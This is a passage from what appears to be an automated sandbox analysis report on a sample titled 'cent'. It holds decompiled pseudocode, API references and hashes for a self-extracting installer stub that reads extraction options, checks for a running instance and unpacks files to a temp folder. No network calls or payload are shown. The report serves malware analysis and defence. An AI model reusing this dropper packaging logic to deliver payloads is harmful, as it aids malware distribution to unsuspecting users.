                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}

























                                                                                                                                                                                                        0x00de321b
                                                                                                                                                                                                        0x00de321e
                                                                                                                                                                                                        0x00de3221
                                                                                                                                                                                                        0x00de343c
                                                                                                                                                                                                        0x00de343e
                                                                                                                                                                                                        0x00de343f
                                                                                                                                                                                                        0x00de3445
                                                                                                                                                                                                        0x00de3447
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3447
                                                                                                                                                                                                        0x00de3229
                                                                                                                                                                                                        0x00de322a
                                                                                                                                                                                                        0x00de322f
                                                                                                                                                                                                        0x00de33ec
                                                                                                                                                                                                        0x00de33f7
                                                                                                                                                                                                        0x00de3410
                                                                                                                                                                                                        0x00de3416
                                                                                                                                                                                                        0x00de341d
                                                                                                                                                                                                        0x00de342d
                                                                                                                                                                                                        0x00de342d
                                                                                                                                                                                                        0x00de3438
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3438
                                                                                                                                                                                                        0x00de3237
                                                                                                                                                                                                        0x00de3243
                                                                                                                                                                                                        0x00de3243
                                                                                                                                                                                                        0x00de3246
                                                                                                                                                                                                        0x00de32ee
                                                                                                                                                                                                        0x00de32f4
                                                                                                                                                                                                        0x00de32f6
                                                                                                                                                                                                        0x00de33d4
                                                                                                                                                                                                        0x00de33d6
                                                                                                                                                                                                        0x00de33db
                                                                                                                                                                                                        0x00de33dc
                                                                                                                                                                                                        0x00de33de
                                                                                                                                                                                                        0x00de33df
                                                                                                                                                                                                        0x00de3370
                                                                                                                                                                                                        0x00de3372
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3372
                                                                                                                                                                                                        0x00de32fc
                                                                                                                                                                                                        0x00de3301
                                                                                                                                                                                                        0x00de3301
                                                                                                                                                                                                        0x00de3303
                                                                                                                                                                                                        0x00de3304
                                                                                                                                                                                                        0x00de3304
                                                                                                                                                                                                        0x00de330a
                                                                                                                                                                                                        0x00de330d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3313
                                                                                                                                                                                                        0x00de3318
                                                                                                                                                                                                        0x00de331a
                                                                                                                                                                                                        0x00de3331
                                                                                                                                                                                                        0x00de3332
                                                                                                                                                                                                        0x00de333a
                                                                                                                                                                                                        0x00de333d
                                                                                                                                                                                                        0x00de337c
                                                                                                                                                                                                        0x00de3388
                                                                                                                                                                                                        0x00de338f
                                                                                                                                                                                                        0x00de3394
                                                                                                                                                                                                        0x00de3396
                                                                                                                                                                                                        0x00de33a4
                                                                                                                                                                                                        0x00de33ab
                                                                                                                                                                                                        0x00de33b6
                                                                                                                                                                                                        0x00de33be
                                                                                                                                                                                                        0x00de33c3
                                                                                                                                                                                                        0x00de33c5
                                                                                                                                                                                                        0x00de3435
                                                                                                                                                                                                        0x00de3437
                                                                                                                                                                                                        0x00de3437
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3437
                                                                                                                                                                                                        0x00de33c7
                                                                                                                                                                                                        0x00de33c9
                                                                                                                                                                                                        0x00de33cc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de33cc
                                                                                                                                                                                                        0x00de33ad
                                                                                                                                                                                                        0x00de33b4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de33b4
                                                                                                                                                                                                        0x00de3398
                                                                                                                                                                                                        0x00de3399
                                                                                                                                                                                                        0x00de339b
                                                                                                                                                                                                        0x00de339c
                                                                                                                                                                                                        0x00de339d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de339d
                                                                                                                                                                                                        0x00de334c
                                                                                                                                                                                                        0x00de3351
                                                                                                                                                                                                        0x00de3354
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de335c
                                                                                                                                                                                                        0x00de3362
                                                                                                                                                                                                        0x00de3364
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3366
                                                                                                                                                                                                        0x00de3367
                                                                                                                                                                                                        0x00de3369
                                                                                                                                                                                                        0x00de336a
                                                                                                                                                                                                        0x00de336b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de336b
                                                                                                                                                                                                        0x00de331c
                                                                                                                                                                                                        0x00de3323
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3329
                                                                                                                                                                                                        0x00de332b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de332b
                                                                                                                                                                                                        0x00de324c
                                                                                                                                                                                                        0x00de324c
                                                                                                                                                                                                        0x00de324f
                                                                                                                                                                                                        0x00de32c8
                                                                                                                                                                                                        0x00de32ce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de32ce
                                                                                                                                                                                                        0x00de3251
                                                                                                                                                                                                        0x00de3256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3271
                                                                                                                                                                                                        0x00de3277
                                                                                                                                                                                                        0x00de3279
                                                                                                                                                                                                        0x00de3298
                                                                                                                                                                                                        0x00de329d
                                                                                                                                                                                                        0x00de329f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de32b0
                                                                                                                                                                                                        0x00de32b6
                                                                                                                                                                                                        0x00de32b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de32be
                                                                                                                                                                                                        0x00de3280
                                                                                                                                                                                                        0x00de3289
                                                                                                                                                                                                        0x00de328e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de328e
                                                                                                                                                                                                        0x00de327b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de327b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000003E8,00DE8598,00000200), ref: 00DE3271
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00DE33E2
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 00DE33F7
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00DE3410
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000836), ref: 00DE3426
                                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00DE342D
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00DE343F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$cent
                                                                                                                                                                                                        • API String ID: 2418873061-2054018256
                                                                                                                                                                                                        • Opcode ID: 8a155fc0a88232040329073c3947b2aee14a90b49653c56bcfbbc166f439ca40
                                                                                                                                                                                                        • Instruction ID: b57227ea24cd4fdcca37db780e8fc536dc44733c1de3fc790ddae1177fd71d3e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a155fc0a88232040329073c3947b2aee14a90b49653c56bcfbbc166f439ca40
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC5105303413C17AEB267B3B5C8CF7F6A59DB46B54F544028F245DB2D1CAA4DE019271
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00DE2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				struct HRSRC__* _t31;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t13 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                        				_t65 = 0;
                                                                                                                                                                                                        				_t66 = __ecx;
                                                                                                                                                                                                        				_t48 = __edx;
                                                                                                                                                                                                        				 *0xde9a3c = __ecx;
                                                                                                                                                                                                        				memset(0xde9140, 0, 0x8fc);
                                                                                                                                                                                                        				memset(0xde8a20, 0, 0x32c);
                                                                                                                                                                                                        				memset(0xde88c0, 0, 0x104);
                                                                                                                                                                                                        				 *0xde93ec = 1;
                                                                                                                                                                                                        				_t20 = E00DE468F("TITLE", 0xde9154, 0x7f);
                                                                                                                                                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                        					_t64 = 0x4b1;
                                                                                                                                                                                                        					goto L32;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                        					 *0xde858c = _t27;
                                                                                                                                                                                                        					SetEvent(_t27);
                                                                                                                                                                                                        					_t64 = 0xde9a34;
                                                                                                                                                                                                        					if(E00DE468F("EXTRACTOPT", 0xde9a34, 4) != 0) {
                                                                                                                                                                                                        						if(( *0xde9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                        							L12:
                                                                                                                                                                                                        							 *0xde9120 =  *0xde9120 & _t65;
                                                                                                                                                                                                        							if(E00DE5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                        								if( *0xde8a3a == 0) {
                                                                                                                                                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                        									if(_t31 != 0) {
                                                                                                                                                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0xde8184 != 0) {
                                                                                                                                                                                                        										__imp__#17();
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0xde8a24 == 0) {
                                                                                                                                                                                                        										_t57 = _t65;
                                                                                                                                                                                                        										if(E00DE36EE(_t65) == 0) {
                                                                                                                                                                                                        											goto L33;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t33 =  *0xde9a40; // 0x3
                                                                                                                                                                                                        											_t48 = 1;
                                                                                                                                                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                        												if(( *0xde9a34 & 0x00000100) == 0 || ( *0xde8a38 & 0x00000001) != 0 || E00DE18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t64 = 0x7d6;
                                                                                                                                                                                                        													if(E00DE6517(_t57, 0x7d6, _t34, E00DE19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                        														goto L33;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												L30:
                                                                                                                                                                                                        												_t23 = _t48;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t23 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00DE2390(0xde8a3a);
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t64 = 0x520;
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								E00DE44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 =  &_v268;
                                                                                                                                                                                                        							if(E00DE468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        								goto L3;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                        								 *0xde8588 = _t43;
                                                                                                                                                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(( *0xde9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                        										_t64 = 0x524;
                                                                                                                                                                                                        										if(E00DE44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                        											goto L12;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L11;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t64 = 0x54b;
                                                                                                                                                                                                        										E00DE44B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                        										L11:
                                                                                                                                                                                                        										CloseHandle( *0xde8588);
                                                                                                                                                                                                        										 *0xde9124 = 0x800700b7;
                                                                                                                                                                                                        										goto L33;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t64 = 0x4b1;
                                                                                                                                                                                                        						E00DE44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						 *0xde9124 = 0x80070714;
                                                                                                                                                                                                        						L33:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x00de2cb5
                                                                                                                                                                                                        0x00de2cbc
                                                                                                                                                                                                        0x00de2cc7
                                                                                                                                                                                                        0x00de2cc9
                                                                                                                                                                                                        0x00de2cd1
                                                                                                                                                                                                        0x00de2cd3
                                                                                                                                                                                                        0x00de2cd9
                                                                                                                                                                                                        0x00de2ce9
                                                                                                                                                                                                        0x00de2cf9
                                                                                                                                                                                                        0x00de2d0e
                                                                                                                                                                                                        0x00de2d15
                                                                                                                                                                                                        0x00de2d1c
                                                                                                                                                                                                        0x00de2ef3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2d2d
                                                                                                                                                                                                        0x00de2d34
                                                                                                                                                                                                        0x00de2d3b
                                                                                                                                                                                                        0x00de2d40
                                                                                                                                                                                                        0x00de2d48
                                                                                                                                                                                                        0x00de2d59
                                                                                                                                                                                                        0x00de2d84
                                                                                                                                                                                                        0x00de2e1f
                                                                                                                                                                                                        0x00de2e1f
                                                                                                                                                                                                        0x00de2e2e
                                                                                                                                                                                                        0x00de2e41
                                                                                                                                                                                                        0x00de2e5a
                                                                                                                                                                                                        0x00de2e62
                                                                                                                                                                                                        0x00de2e6c
                                                                                                                                                                                                        0x00de2e6c
                                                                                                                                                                                                        0x00de2e75
                                                                                                                                                                                                        0x00de2e77
                                                                                                                                                                                                        0x00de2e77
                                                                                                                                                                                                        0x00de2e84
                                                                                                                                                                                                        0x00de2e8b
                                                                                                                                                                                                        0x00de2e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2e96
                                                                                                                                                                                                        0x00de2e96
                                                                                                                                                                                                        0x00de2e9e
                                                                                                                                                                                                        0x00de2ea2
                                                                                                                                                                                                        0x00de2eba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2ece
                                                                                                                                                                                                        0x00de2ede
                                                                                                                                                                                                        0x00de2eed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2eed
                                                                                                                                                                                                        0x00de2eef
                                                                                                                                                                                                        0x00de2eef
                                                                                                                                                                                                        0x00de2eef
                                                                                                                                                                                                        0x00de2eef
                                                                                                                                                                                                        0x00de2ea2
                                                                                                                                                                                                        0x00de2e86
                                                                                                                                                                                                        0x00de2e88
                                                                                                                                                                                                        0x00de2e88
                                                                                                                                                                                                        0x00de2e43
                                                                                                                                                                                                        0x00de2e48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2e48
                                                                                                                                                                                                        0x00de2e30
                                                                                                                                                                                                        0x00de2e30
                                                                                                                                                                                                        0x00de2ef8
                                                                                                                                                                                                        0x00de2f01
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2f01
                                                                                                                                                                                                        0x00de2d8a
                                                                                                                                                                                                        0x00de2d8f
                                                                                                                                                                                                        0x00de2da1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2da3
                                                                                                                                                                                                        0x00de2dae
                                                                                                                                                                                                        0x00de2db4
                                                                                                                                                                                                        0x00de2dbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2dca
                                                                                                                                                                                                        0x00de2dd3
                                                                                                                                                                                                        0x00de2df5
                                                                                                                                                                                                        0x00de2e02
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2dd5
                                                                                                                                                                                                        0x00de2dde
                                                                                                                                                                                                        0x00de2de3
                                                                                                                                                                                                        0x00de2e04
                                                                                                                                                                                                        0x00de2e0a
                                                                                                                                                                                                        0x00de2e10
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2e10
                                                                                                                                                                                                        0x00de2dd3
                                                                                                                                                                                                        0x00de2dbb
                                                                                                                                                                                                        0x00de2da1
                                                                                                                                                                                                        0x00de2d5b
                                                                                                                                                                                                        0x00de2d5b
                                                                                                                                                                                                        0x00de2d5d
                                                                                                                                                                                                        0x00de2d69
                                                                                                                                                                                                        0x00de2d6e
                                                                                                                                                                                                        0x00de2f06
                                                                                                                                                                                                        0x00de2f06
                                                                                                                                                                                                        0x00de2f06
                                                                                                                                                                                                        0x00de2d59
                                                                                                                                                                                                        0x00de2f18

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00DE2CD9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00DE2CE9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00DE2CF9
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46A0
                                                                                                                                                                                                          • Part of subcall function 00DE468F: SizeofResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46A9
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46C3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LoadResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46CC
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LockResource.KERNEL32(00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46D3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: memcpy_s.MSVCRT ref: 00DE46E5
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46EF
                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE2D34
                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE2D40
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE2DAE
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00DE2DBD
                                                                                                                                                                                                        • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE2E0A
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                        • API String ID: 1002816675-2654900392
                                                                                                                                                                                                        • Opcode ID: 67742bd686380bc3c5240dae7246c359ed67b0aef28e7ecf2aa1859633b433d7
                                                                                                                                                                                                        • Instruction ID: 67ba91fec35a255e49fe02d2d44609b2b8ec17cc0a77256c600d086079eca859
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67742bd686380bc3c5240dae7246c359ed67b0aef28e7ecf2aa1859633b433d7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4451F2703403D1AAE764BB279C9AB7E369CEB45B10F084039BA85DA3D5DAB4CC419635
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                                                        			E00DE34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				struct HWND__* _t35;
                                                                                                                                                                                                        				struct HWND__* _t38;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t9 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t9 == 0) {
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					 *0xde91d8 = 1;
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                                        					L21:
                                                                                                                                                                                                        					EndDialog();
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				_pop(1);
                                                                                                                                                                                                        				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                        					if(_a12 != 0x1b) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t13 = _t12 - 0xe;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t35 = _a4;
                                                                                                                                                                                                        					 *0xde8584 = _t35;
                                                                                                                                                                                                        					E00DE43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                        					__eflags =  *0xde8184; // 0x1
                                                                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                        					_t17 = CreateThread(0, 0, E00DE4FE0, 0, 0, 0xde8798);
                                                                                                                                                                                                        					 *0xde879c = _t17;
                                                                                                                                                                                                        					__eflags = _t17;
                                                                                                                                                                                                        					if(_t17 != 0) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						E00DE44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t35);
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t23 = _t13 - 1;
                                                                                                                                                                                                        				if(_t23 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 2;
                                                                                                                                                                                                        					if(_a12 != 2) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					ResetEvent( *0xde858c);
                                                                                                                                                                                                        					_t38 =  *0xde8584; // 0x0
                                                                                                                                                                                                        					_t25 = E00DE44B9(_t38, 0x4b2, 0xde1140, 0, 0x20, 4);
                                                                                                                                                                                                        					__eflags = _t25 - 6;
                                                                                                                                                                                                        					if(_t25 == 6) {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						 *0xde91d8 = 1;
                                                                                                                                                                                                        						SetEvent( *0xde858c);
                                                                                                                                                                                                        						_t39 =  *0xde879c; // 0x0
                                                                                                                                                                                                        						E00DE3680(_t39);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t25 - 1;
                                                                                                                                                                                                        					if(_t25 == 1) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetEvent( *0xde858c);
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t23 == 0xe90) {
                                                                                                                                                                                                        					TerminateThread( *0xde879c, 0);
                                                                                                                                                                                                        					EndDialog(_a4, _a12);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        0x00de34fb
                                                                                                                                                                                                        0x00de34fe
                                                                                                                                                                                                        0x00de3665
                                                                                                                                                                                                        0x00de3666
                                                                                                                                                                                                        0x00de3666
                                                                                                                                                                                                        0x00de3668
                                                                                                                                                                                                        0x00de366e
                                                                                                                                                                                                        0x00de366e
                                                                                                                                                                                                        0x00de3671
                                                                                                                                                                                                        0x00de3671
                                                                                                                                                                                                        0x00de3677
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3677
                                                                                                                                                                                                        0x00de3504
                                                                                                                                                                                                        0x00de3506
                                                                                                                                                                                                        0x00de3507
                                                                                                                                                                                                        0x00de350c
                                                                                                                                                                                                        0x00de365b
                                                                                                                                                                                                        0x00de365f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3661
                                                                                                                                                                                                        0x00de3512
                                                                                                                                                                                                        0x00de3515
                                                                                                                                                                                                        0x00de35be
                                                                                                                                                                                                        0x00de35c1
                                                                                                                                                                                                        0x00de35d1
                                                                                                                                                                                                        0x00de35d8
                                                                                                                                                                                                        0x00de35de
                                                                                                                                                                                                        0x00de35f8
                                                                                                                                                                                                        0x00de3617
                                                                                                                                                                                                        0x00de3617
                                                                                                                                                                                                        0x00de3623
